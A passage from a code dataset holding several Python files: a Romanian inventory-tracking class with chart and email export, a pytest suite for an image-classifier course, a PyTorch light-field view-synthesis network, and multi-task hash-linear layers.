1\r\n else:\r\n cheie = 1\r\n self.e[cheie] = self.cant # similar, introducem datele in dictionarele iesiri si data\r\n self.d[cheie] = self.data\r\n\r\n def fisap(self):\r\n self.f1 = tempfile.mktemp('f1.txt')\r\n self.f2 = open(self.f1, 'w+')\r\n print('Fisa produsului ' + self.prod + ': ' + self.um)\r\n self.f2.write('Fisa produsului ' + self.prod + ': ' + self.um)\r\n print(40 * '-')\r\n self.f2.write('\\n'+40 * '-')\r\n print(' Nrc ', ' Data ', 'Intrari', 'Iesiri')\r\n self.f2.write('\\n'+' Nrc '+' Data '+'Intrari '+' Iesiri')\r\n print(40 * '-')\r\n self.f2.write('\\n'+40 * '-')\r\n\r\n for v in self.d.keys():\r\n if v in self.i.keys():\r\n print(str(v).rjust(5), self.d[v], str(self.i[v]).rjust(6), str(0).rjust(6))\r\n a = str(v).rjust(2) + ' '+ str(self.d[v])+str(self.i[v]).rjust(6)+str(0).rjust(6)\r\n self.f2.write('\\n'+a)\r\n else:\r\n print(str(v).rjust(5), str(self.d[v]).rjust(5), str(0).rjust(6), str(self.e[v]).rjust(6))\r\n a = str(v).rjust(2)+' '+str(self.d[v]).rjust(5)+str(0).rjust(6)+str(self.e[v]).rjust(6)\r\n self.f2.write('\\n'+a)\r\n\r\n print(40 * '-')\r\n\r\n self.f2.write('\\n'+40 * '-')\r\n\r\n print('Stoc actual: ' + str(self.sold).rjust(10))\r\n self.f2.write('\\n'+'Stoc actual: ' + str(self.sold).rjust(10))\r\n\r\n print(40 * '-')\r\n self.f2.write('\\n'+40 * '-')\r\n self.f2.close()\r\n\r\n self.f3 = open(self.f1, 'r')\r\n\r\n def grafic(self):\r\n # 1. 
Implementati o solutie care sa returneze o proiectie grafica a intrarilor si iesirilor intr-o\r\n # anumita perioada, pentru un anumit produs;\t--pygal--\r\n data_start = int(input('Introduceti data start (format AAAALLZZ): '))\r\n data_sfarsit = int(input('Introduceti data sfarsit (format AAAALLZZ): '))\r\n self.dictionar_intrari = {}\r\n self.dictionar_iesiri = {}\r\n lista_chei_data=[]\r\n lista_temp_i=[]\r\n lista_temp_e = []\r\n for q in self.d.items():\r\n if data_start <= int(q[1]) <= data_sfarsit:\r\n self.temp_lista_d.append(q[1])\r\n lista_date_unice = sorted(set(self.temp_lista_d))\r\n for data in lista_date_unice:\r\n for i in self.d.keys():\r\n if self.d[i] == data:\r\n lista_chei_data.append(i)\r\n for cheie in lista_chei_data:\r\n if cheie in self.i.keys():\r\n lista_temp_i.append(self.i[cheie])\r\n elif cheie in self.e.keys():\r\n lista_temp_e.append(self.e[cheie])\r\n self.dictionar_iesiri.update({data: lista_temp_e})\r\n self.dictionar_intrari.update({data: lista_temp_i})\r\n lista_chei_data = []\r\n lista_temp_i = []\r\n lista_temp_e = []\r\n chart = pygal.StackedBar()\r\n chart.x_labels = lista_date_unice\r\n lista1 = []\r\n lista2 = []\r\n suma = 0\r\n for element in chart.x_labels:\r\n if len(self.dictionar_intrari[element]) == 1:\r\n for item in self.dictionar_intrari[element]:\r\n lista1.append(item)\r\n elif not len(self.dictionar_intrari[element]):\r\n lista1.append(0)\r\n else:\r\n for item in self.dictionar_intrari[element]:\r\n suma += item\r\n lista1.append(suma)\r\n suma = 0\r\n for element in chart.x_labels:\r\n if len(self.dictionar_iesiri[element]) == 1:\r\n for item in self.dictionar_iesiri[element]:\r\n lista2.append(item)\r\n elif not len(self.dictionar_iesiri[element]):\r\n lista2.append(0)\r\n else:\r\n for item in self.dictionar_iesiri[element]:\r\n suma += item\r\n lista2.append(suma)\r\n chart.add('Intrari',lista1)\r\n chart.add('Iesiri',lista2)\r\n chart.render_to_file('Grafic intrari si iesiri '+ str(data_start) + ' ' + str(data_sfarsit) + '.svg')\r\n\r\n def email(self):\r\n sender = input('Va rog introduceti adresa dvs de gmail:\\n')\r\n passw = input('Va rog introduceti parola dvs de gmail:\\n')\r\n receiver = input('Introduceti adresa de e-mail a destinatarului:\\n')\r\n subject = 'Fisa produsului ' + self.prod + ': ' + self.um\r\n self.fisap()\r\n message = 'Subject: {0}\\n\\n{1}'.format(subject, self.f3.read())\r\n\r\n smtp_ob = smtplib.SMTP_SSL('smtp.gmail.com', 465)\r\n smtp_ob.login(user=sender, password=passw)\r\n smtp_ob.sendmail(from_addr=sender, to_addrs=receiver, msg=message)\r\n\r\n# Introducerea de elemente in stoc\r\n\r\nfragute = Stoc('fragute', 'fructe', 'kg') # cream instantele clasei\r\nfragute.intr(100, data='20191001')\r\nfragute.intr(60, data='20191007')\r\nfragute.iesi(111, data='20191105')\r\nfragute.intr(100)\r\nfragute.iesi(73)\r\nfragute.iesi(85)\r\n\r\n\"\"\"1. Implementati o solutie care sa returneze o proiectie grafica a intrarilor si iesirilor intr-o\r\nanumita perioada, pentru un anumit produs;\t--pygal--\"\"\"\r\n\r\nfragute.grafic()\r\n\r\n\"\"\"Exercitiul 2 poate fi testat prin instantiere\"\"\"\r\n\r\n\"\"\"3. 
Creati o metoda cu ajutorul careia sa puteti transmite prin email diferite informatii(\r\nde exemplu fisa produsului) ; \t--SMTP--\"\"\"\r\n\r\nfragute.email()\r\n\r\n","sub_path":"Info_academy_final_project.py","file_name":"Info_academy_final_project.py","file_ext":"py","file_size_in_byte":8844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"96643954","text":"import pytest\n\n### CBC SOLUTIONS BLOCK\n# do not modify, for CBC internal use only\nimport importlib\nif pytest.config.getoption('solns', default=False):\n vr_func = importlib.import_module(\"vr_func_solns\")\nelse:\n vr_func = importlib.import_module(\"vr_func\")\n### END OF CBC SOLUTIONS BLOCK\n\nimport json\n\ndef read_json_file(file_path):\n \"\"\"Reads and parse a json file.\n\n Parameters\n ----------\n file_path : {str} the path to the json file.\n\n Returns\n -------\n dict : a dictionary containing the json structure read from the file.\n \"\"\"\n with open(file_path) as json_file:\n json_content = json_file.read()\n json_data = json.loads(json_content)\n\n return(json_data)\n\n\ndef test_parse_classes():\n data = read_json_file('pytest_data/classifier_output_1.json')\n\n assert vr_func.parse_classes(data) == {'street','road','yellow color','green color'}, \\\n \"when run on file 'pytest_data/classifier_output_1.json', should return {'street','road','yellow color','green color'}\"\n\n data = read_json_file('pytest_data/classifier_output_empty.json')\n\n assert vr_func.parse_classes(data) == set(), \\\n \"when run on file 'pytest_data/classifier_output_empty.json', should return an empty set\"\n\n\ndef test_measure_accuracy():\n image_list = [\n { 'path':'1.jpg', 'actual':{'dog'}, 'predicted':{'dog'} },\n { 'path':'2.jpg', 'actual':{'dog'}, 'predicted':{'cat'} },\n { 'path':'3.jpg', 'actual':{'cat'}, 'predicted':{'cat'} },\n { 'path':'4.jpg', 'actual':{'cat'}, 'predicted':{'dog'} },\n { 'path':'5.jpg', 'actual':{'dog'}, 'predicted':{'dog'} }\n ]\n assert vr_func.measure_accuracy(image_list) == 0.6, \"when run on course first example, should return 0.6\"\n\n image_list = [\n { 'path':'1.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'2.jpg', 'actual':{'b'}, 'predicted':{'b'} },\n { 'path':'3.jpg', 'actual':{'c'}, 'predicted':{'a'} },\n { 'path':'4.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'5.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'6.jpg', 'actual':{'b'}, 'predicted':{'b'} },\n { 'path':'7.jpg', 'actual':{'c'}, 'predicted':{'a'} },\n { 'path':'8.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'9.jpg', 'actual':{'a'}, 'predicted':{'a'} },\n { 'path':'10.jpg', 'actual':{'b'}, 'predicted':{'b'} }\n ]\n assert vr_func.measure_accuracy(image_list) == 0.8, \"when run on course second example, should return 0.8\"\n","sub_path":"code/visualrecognition/vr_func_test.py","file_name":"vr_func_test.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"106222554","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\nimport torch.nn as nn\nimport pdb\nimport torch\nimport numpy as np\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\nclass Net(nn.Module):\n \n def __init__(self, input_shape, minibatch_size, lfsize, \n fFilts = 16, dFilts = 64, sFilts = 128, batchAffine = False):\n super(Net, self).__init__()\n \n # net = Net((height, width), minibatch_size, patch_size, lfsize)\n \n self.input_channels = 3\n self.lfsize = 
lfsize\n self.dmax = 4\n \n # Matrix P and Q will be passed to the network\n self.P = torch.empty((minibatch_size,) + input_shape).unsqueeze(1)\n self.Q = torch.empty((minibatch_size,) + input_shape).unsqueeze(1)\n \n # Memory to hold multiplier for correct disparity\n # 4 represents four disparity maps\n self.D = torch.empty(minibatch_size,4,1,1,2)\n \n # A divider to normalize the range of disparities using the image size\n self.div = torch.from_numpy(np.array(input_shape[1::-1])[None,None,None,:]/2).float()\n \n # Grid to warp image\n self.grid_w, self.grid_h = np.meshgrid(np.linspace(-1, 1, input_shape[1]),\n np.linspace(-1, 1, input_shape[0]))\n \n self.grid = torch.stack((\n torch.tensor(self.grid_w, dtype=torch.float32), \n torch.tensor(self.grid_h, dtype=torch.float32)),2).unsqueeze(0)\n \n # Converting to cuda tensor if available\n if torch.cuda.is_available():\n self.P = self.P.cuda()\n self.Q = self.Q.cuda()\n self.D = self.D.cuda()\n self.grid = self.grid.cuda()\n self.div = self.div.cuda()\n \n # Making beta learnable parameter\n self.beta = torch.nn.Parameter(torch.tensor(1, dtype=torch.float32))\n self.beta.requires_grad = True\n \n # Features CNN 1\n # (input channels, output channels, kernel size, padding)\n self.f1_conv0 = nn.Conv2d(self.input_channels, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv1 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv2 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv3 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f1_conv4 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n \n self.f1_pool0 = nn.AvgPool2d(16, stride = 16)\n self.f1_pool1 = nn.AvgPool2d(8, stride = 8)\n \n self.f1_conv5 = nn.Conv2d(fFilts*4, fFilts, kernel_size = 3, padding = 1)\n \n self.f1_bn0 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn1 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn2 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn3 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn4 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f1_bn5 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n \n # Features CNN 2\n # (input channels, output channels, kernel size, padding)\n self.f2_conv0 = nn.Conv2d(self.input_channels, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv1 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv2 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv3 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n self.f2_conv4 = nn.Conv2d(fFilts, fFilts, kernel_size = 3, padding = 1)\n \n self.f2_pool0 = nn.AvgPool2d(16, stride = 16)\n self.f2_pool1 = nn.AvgPool2d(8, stride = 8)\n \n self.f2_conv5 = nn.Conv2d(fFilts*4, fFilts, kernel_size = 3, padding = 1)\n \n self.f2_bn0 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn1 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn2 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn3 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn4 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n self.f2_bn5 = nn.BatchNorm2d(fFilts, affine=batchAffine)\n \n \n # Disparity CNN 1\n # \n self.d1_conv0 = nn.Conv2d(fFilts*2, dFilts, kernel_size = 3, padding = 2, dilation = 2)\n self.d1_conv1 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 4, dilation = 4)\n self.d1_conv2 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 8, dilation = 8)\n self.d1_conv3 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 16, dilation = 16)\n 
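        # The dilation series 2/4/8/16 in d1_conv0..d1_conv3 above grows the
        # receptive field geometrically at constant parameter cost: a 3x3 conv
        # with dilation d adds 2*d pixels of context, so these four layers alone
        # span roughly 1 + 2*(2+4+8+16) = 61 pixels. Commented-out shape sketch
        # (the probe tensor is hypothetical, not part of the original network):
        #   probe = torch.randn(1, dFilts, 64, 64)
        #   assert self.d1_conv1(probe).shape == probe.shape  # padding == dilation keeps H, W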
self.d1_conv4 = nn.Conv2d(dFilts, dFilts//2, kernel_size = 3, padding = 1)\n self.d1_conv5 = nn.Conv2d(dFilts//2, dFilts//2, kernel_size = 3, padding = 1)\n self.d1_conv6 = nn.Conv2d(dFilts//2, 1, kernel_size = 3, padding = 1)\n \n self.d1_bn0 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn1 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn2 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn3 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d1_bn4 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n self.d1_bn5 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n \n # Disparity CNN 2\n # \n self.d2_conv0 = nn.Conv2d(fFilts*2, dFilts, kernel_size = 3, padding = 2, dilation = 2)\n self.d2_conv1 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 4, dilation = 4)\n self.d2_conv2 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 8, dilation = 8)\n self.d2_conv3 = nn.Conv2d(dFilts, dFilts, kernel_size = 3, padding = 16, dilation = 16)\n self.d2_conv4 = nn.Conv2d(dFilts, dFilts//2, kernel_size = 3, padding = 1)\n self.d2_conv5 = nn.Conv2d(dFilts//2, dFilts//2, kernel_size = 3, padding = 1)\n self.d2_conv6 = nn.Conv2d(dFilts//2, 1, kernel_size = 3, padding = 1)\n \n self.d2_bn0 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn1 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn2 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn3 = nn.BatchNorm2d(dFilts, affine=batchAffine)\n self.d2_bn4 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n self.d2_bn5 = nn.BatchNorm2d(dFilts//2, affine=batchAffine)\n \n # Selection CNN\n # \n self.s_conv0 = nn.Conv2d(14, sFilts//2, kernel_size = 3, padding = 1) \n self.s_conv1 = nn.Conv2d(sFilts//2, sFilts, kernel_size = 3, padding = 1)\n self.s_conv2 = nn.Conv2d(sFilts, sFilts, kernel_size = 3, padding = 1)\n self.s_conv3 = nn.Conv2d(sFilts, sFilts, kernel_size = 3, padding = 1)\n self.s_conv4 = nn.Conv2d(sFilts, sFilts//2, kernel_size = 3, padding = 1)\n self.s_conv5 = nn.Conv2d(sFilts//2, sFilts//2, kernel_size = 3, padding = 1)\n self.s_conv6 = nn.Conv2d(sFilts//2, sFilts//4, kernel_size = 3, padding = 1)\n self.s_conv7 = nn.Conv2d(sFilts//4, 12, kernel_size = 3, padding = 1)\n \n self.s_bn0 = nn.BatchNorm2d(sFilts//2, affine=batchAffine)\n self.s_bn1 = nn.BatchNorm2d(sFilts, affine=batchAffine)\n self.s_bn2 = nn.BatchNorm2d(sFilts, affine=batchAffine)\n self.s_bn3 = nn.BatchNorm2d(sFilts, affine=batchAffine)\n self.s_bn4 = nn.BatchNorm2d(sFilts//2, affine=batchAffine)\n self.s_bn5 = nn.BatchNorm2d(sFilts//2, affine=batchAffine)\n self.s_bn6 = nn.BatchNorm2d(sFilts//4, affine=batchAffine)\n \n # Features CNN 1\n def f1cnn(self, x):\n \n x = self.f1_bn0(F.elu(self.f1_conv0(x)))\n x = self.f1_bn1(F.elu(self.f1_conv1(x)))\n x = self.f1_bn2(F.elu(self.f1_conv2(x)))\n x_conv2 = x\n x = self.f1_bn3(F.elu(self.f1_conv3(x)))\n x = self.f1_bn4(F.elu(self.f1_conv4(x)))\n x_conv4 = x + x_conv2\n \n x_pool0 = F.upsample(self.f1_pool0(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n x_pool1 = F.upsample(self.f1_pool1(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n \n x = torch.cat((x_conv2, x_conv4, x_pool0, x_pool1), 1)\n \n x = self.f1_bn5(F.elu(self.f1_conv5(x)))\n \n return x\n \n # Features CNN 2\n def f2cnn(self, x):\n \n x = self.f2_bn0(F.elu(self.f2_conv0(x)))\n x = self.f2_bn1(F.elu(self.f2_conv1(x)))\n x = self.f2_bn2(F.elu(self.f2_conv2(x)))\n x_conv2 = x\n x = self.f2_bn3(F.elu(self.f2_conv3(x)))\n x = self.f2_bn4(F.elu(self.f2_conv4(x)))\n x_conv4 = x + 
x_conv2\n \n x_pool0 = F.upsample(self.f2_pool0(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n x_pool1 = F.upsample(self.f2_pool1(x_conv4), x_conv4.size()[2:4], \n mode='bilinear', align_corners = True)\n \n x = torch.cat((x_conv2, x_conv4, x_pool0, x_pool1), 1)\n \n x = self.f2_bn5(F.elu(self.f2_conv5(x)))\n \n return x\n \n # Disparity CNN 1\n def d1cnn(self, x):\n \n x = self.d1_bn0(F.elu(self.d1_conv0(x)))\n x = self.d1_bn1(F.elu(self.d1_conv1(x)))\n x = self.d1_bn2(F.elu(self.d1_conv2(x)))\n x = self.d1_bn3(F.elu(self.d1_conv3(x)))\n x = self.d1_bn4(F.elu(self.d1_conv4(x)))\n x = self.d1_bn5(F.elu(self.d1_conv5(x)))\n x = torch.tanh(self.d1_conv6(x))\n \n return x.mul(self.dmax)\n \n # Disparity CNN 2\n def d2cnn(self, x):\n \n x = self.d2_bn0(F.elu(self.d2_conv0(x)))\n x = self.d2_bn1(F.elu(self.d2_conv1(x)))\n x = self.d2_bn2(F.elu(self.d2_conv2(x)))\n x = self.d2_bn3(F.elu(self.d2_conv3(x)))\n x = self.d2_bn4(F.elu(self.d2_conv4(x)))\n x = self.d2_bn5(F.elu(self.d2_conv5(x)))\n x = torch.tanh(self.d2_conv6(x))\n \n return x.mul(self.dmax)\n \n # Selection CNN\n def scnn(self, x):\n \n x = self.s_bn0(F.elu(self.s_conv0(x)))\n x = self.s_bn1(F.elu(self.s_conv1(x)))\n x = self.s_bn2(F.elu(self.s_conv2(x)))\n x = self.s_bn3(F.elu(self.s_conv3(x)))\n x = self.s_bn4(F.elu(self.s_conv4(x)))\n x = self.s_bn5(F.elu(self.s_conv5(x)))\n x = self.s_bn6(F.elu(self.s_conv6(x)))\n x = torch.tanh(self.s_conv7(x))\n \n x = F.softmax(self.beta*x,dim = 1)\n \n return x\n\n def forward(self, x, p, q):\n # extract input features\n \n # Top-Left (-3, -3),\n self.D[:,0,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) + 3\n self.D[:,0,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) + 3\n \n # Top-right (-3, +3),\n self.D[:,1,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) + 3\n self.D[:,1,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) - 3\n \n # Bottom-Left (+3, -3),\n self.D[:,2,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) - 3\n self.D[:,2,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) + 3\n \n # Bottom-right (+3, +3),\n self.D[:,3,:,:,1] = p[:,None,None]*(self.lfsize[2] // 2) - 3\n self.D[:,3,:,:,0] = q[:,None,None]*(self.lfsize[3] // 2) - 3\n \n self.P[:,:,:,:] = p[:,None,None,None]\n self.Q[:,:,:,:] = q[:,None,None,None]\n \n # [sample, channels, height, width, corner] \n x_00 = x[:,:3] # 0:3 top-left\n x_01 = x[:,6:9] # 6:9 top-right\n x_10 = x[:,3:6] # 3:6 bottom-left\n x_11 = x[:,9:] # 9:12 bottom-right\n \n # Extracting horizontal and forward diagonal features\n Fh_00 = self.f1cnn(x_00); Ff_00 = self.f2cnn(x_00);\n Fh_01 = self.f1cnn(x_01); Ff_01 = self.f2cnn(x_01);\n Fh_10 = self.f1cnn(x_10); Ff_10 = self.f2cnn(x_10);\n Fh_11 = self.f1cnn(x_11); Ff_11 = self.f2cnn(x_11);\n \n dh_00 = self.d1cnn(torch.cat((Fh_00, Fh_01), 1))\n dh_01 = - self.d1cnn(torch.cat((Fh_01, Fh_00), 1))\n dh_10 = self.d1cnn(torch.cat((Fh_10, Fh_11), 1))\n dh_11 = - self.d1cnn(torch.cat((Fh_11, Fh_10), 1))\n \n df_01 = self.d2cnn(torch.cat((Ff_01, Ff_10), 1))\n df_10 = - self.d2cnn(torch.cat((Ff_10, Ff_01), 1))\n \n # Extracting vertical and backward diagonal features\n Fv_00 = self.f1cnn(x_00.permute(0,1,3,2)); Fb_00 = self.f2cnn(x_00.flip(3));\n Fv_01 = self.f1cnn(x_01.permute(0,1,3,2)); Fb_01 = self.f2cnn(x_01.flip(3));\n Fv_10 = self.f1cnn(x_10.permute(0,1,3,2)); Fb_10 = self.f2cnn(x_10.flip(3));\n Fv_11 = self.f1cnn(x_11.permute(0,1,3,2)); Fb_11 = self.f2cnn(x_11.flip(3));\n \n dv_00 = self.d1cnn(torch.cat((Fv_00, Fv_10), 1)).permute(0,1,3,2)\n dv_10 = - self.d1cnn(torch.cat((Fv_10, Fv_00), 
1)).permute(0,1,3,2)\n dv_01 = self.d1cnn(torch.cat((Fv_01, Fv_11), 1)).permute(0,1,3,2)\n dv_11 = - self.d1cnn(torch.cat((Fv_11, Fv_01), 1)).permute(0,1,3,2)\n \n db_00 = self.d2cnn(torch.cat((Fb_00, Fb_11), 1)).flip(3)\n db_11 = - self.d2cnn(torch.cat((Fb_11, Fb_00), 1)).flip(3)\n \n # Calculating 12 disparity maps\n Dh_00 = dh_00[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,0]\n Db_00 = db_00[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,0]\n Dv_00 = dv_00[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,0]\n \n Dh_01 = dh_01[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,1]\n Df_01 = df_01[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,1]\n Dv_01 = dv_01[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,1]\n \n Dh_10 = dh_10[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,2]\n Df_10 = df_10[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,2]\n Dv_10 = dv_10[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,2]\n \n Dh_11 = dh_11[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,3]\n Db_11 = db_11[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,3]\n Dv_11 = dv_11[:,0].unsqueeze(3).repeat(1,1,1,2)*self.D[:,3]\n \n \n \n wh_00 = F.grid_sample(x_00, self.grid + Dh_00/(self.div), align_corners=False)\n wb_00 = F.grid_sample(x_00, self.grid + Db_00/(self.div), align_corners=False)\n wv_00 = F.grid_sample(x_00, self.grid + Dv_00/(self.div), align_corners=False)\n \n wh_01 = F.grid_sample(x_01, self.grid + Dh_01/(self.div), align_corners=False)\n wf_01 = F.grid_sample(x_01, self.grid + Df_01/(self.div), align_corners=False)\n wv_01 = F.grid_sample(x_01, self.grid + Dv_01/(self.div), align_corners=False)\n \n wh_10 = F.grid_sample(x_10, self.grid + Dh_10/(self.div), align_corners=False)\n wf_10 = F.grid_sample(x_10, self.grid + Df_10/(self.div), align_corners=False)\n wv_10 = F.grid_sample(x_10, self.grid + Dv_10/(self.div), align_corners=False)\n \n wh_11 = F.grid_sample(x_11, self.grid + Dh_11/(self.div), align_corners=False)\n wb_11 = F.grid_sample(x_11, self.grid + Db_11/(self.div), align_corners=False)\n wv_11 = F.grid_sample(x_11, self.grid + Dv_11/(self.div), align_corners=False)\n \n \n W = torch.cat((wh_00[:,:,:,:,None], wb_00[:,:,:,:,None], wv_00[:,:,:,:,None],\n wh_01[:,:,:,:,None], wf_01[:,:,:,:,None], wv_01[:,:,:,:,None],\n wh_10[:,:,:,:,None], wf_10[:,:,:,:,None], wv_10[:,:,:,:,None],\n wh_11[:,:,:,:,None], wb_11[:,:,:,:,None], wv_11[:,:,:,:,None]),4)\n W = W.permute(0,4,2,3,1)\n \n M = self.scnn(torch.cat((dh_00/self.dmax, db_00/self.dmax, dv_00/self.dmax,\n dh_01/self.dmax, df_01/self.dmax, dv_01/self.dmax,\n dh_10/self.dmax, df_10/self.dmax, dv_10/self.dmax,\n dh_11/self.dmax, db_11/self.dmax, dv_11/self.dmax, \n self.P, self.Q), 1))\n \n I = torch.sum(M.unsqueeze(4)*W, dim = 1).permute(0, 3, 1, 2)\n \n return I\n\n\ndef get_variable(x):\n \"\"\" Converts tensors to cuda, if available. \"\"\"\n if torch.cuda.is_available():\n return x.cuda()\n return x\n\ndef get_numpy(x):\n \"\"\" Get numpy array for both cuda and not. 
\"\"\"\n if torch.cuda.is_available():\n return x.cpu().data.numpy()\n return x.data.numpy()\n\n","sub_path":"OAVS-navarro/Networks/UDDE_000.py","file_name":"UDDE_000.py","file_ext":"py","file_size_in_byte":16600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"321646614","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.normal import Normal\n\nclass HashLinear(nn.Linear):\n \"\"\"\n Base Class\n \"\"\"\n def __init__(self, n_in, n_out, bias=True):\n super(HashLinear, self).__init__(n_in, n_out, bias)\n\n def forward(self, x, task_index):\n if self.alpha_mode:\n return self.alpha_forward(x, task_index)\n o = self.o[task_index]\n m = x * o\n r = F.linear(m, self.weight, self.bias)\n return r\n\n def alpha_forward(self, x, alpha):\n o = torch.matmul(self.o, alpha)\n m = torch.matmul(x, o)\n r = F.linear(m, self.weight, self.bias)\n return r\n\nclass OnesHashLinear(HashLinear):\n \"\"\"\n All ones initialization\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=True, alpha_mode=False):\n super(OnesHashLinear, self).__init__(n_in, n_out)\n self.alpha_mode = alpha_mode\n if alpha_mode:\n o = torch.ones((n_in, n_in, num_tasks))\n else:\n o = torch.ones(size=(num_tasks, n_in))\n\n self.o = nn.Parameter(o)\n if not learn_key:\n self.o.requires_grad = False\n\nclass RandHashLinear(HashLinear):\n \"\"\"\n Normal Random Initialization\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=True, alpha_mode=False):\n super(RandHashLinear, self).__init__(n_in, n_out)\n self.alpha_mode = alpha_mode\n if alpha_mode:\n o = torch.randn(size=(n_in, n_in, num_tasks))\n else:\n o = torch.randn(size=(num_tasks, n_in))\n\n self.o = nn.Parameter(o)\n if not learn_key:\n self.o.requires_grad = False\n\nclass BinaryHashLinear(HashLinear):\n \"\"\"\n Random {+1, -1} initialization\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=True, alpha_mode=False):\n super(BinaryHashLinear, self).__init__(n_in, n_out)\n self.alpha_mode = alpha_mode\n if alpha_mode:\n rand_01 = np.random.binomial(p=.5, n=1, size=(n_in, n_in, num_tasks)).astype(np.float32)\n else:\n rand_01 = np.random.binomial(p=.5, n=1, size=(num_tasks, n_in)).astype(np.float32)\n o = torch.from_numpy(rand_01*2 - 1)\n\n self.o = nn.Parameter(o)\n if not learn_key:\n self.o.requires_grad = False\n\nclass SanityCheckLinear(HashLinear):\n \"\"\"\n Just for sanity checking, almost equivalent to independent networks\n \"\"\"\n def __init__(self, n_in, n_out, num_tasks, learn_key=False):\n super(SanityCheckLinear, self).__init__(n_in, n_out)\n o = np.zeros(shape=(num_tasks, n_in))\n mask = np.concatenate((np.ones(int(n_in//num_tasks)), np.zeros(int(n_in - n_in//num_tasks)))).astype(int)\n for task in range(num_tasks):\n o[task] = np.where(mask, 1, 0)\n mask = np.roll(mask, int(n_in//num_tasks))\n o = torch.from_numpy(o).float()\n self.o = nn.Parameter(o)\n self.o.requires_grad = False\n\n#class ProposedContextLinear(nn.Linear):\n# \"\"\"\n# This takes in a context vector proposed by another network\n# \"\"\"\n# def __init__(self, n_in, n_out, num_tasks=None): #numtasks not used\n# super(ProposedContextLinear, self).__init__(n_in, n_out)\n# w = nn.init.xavier_normal_(torch.empty(n_in, n_out))\n# self.w = nn.Parameter(w)\n# self.bias = nn.Parameter(torch.zeros(n_out))\n# self.o = None\n#\n# def forward(self, x, context):\n# m = x * context\n# r = torch.mm(m, self.w) + self.bias\n# 
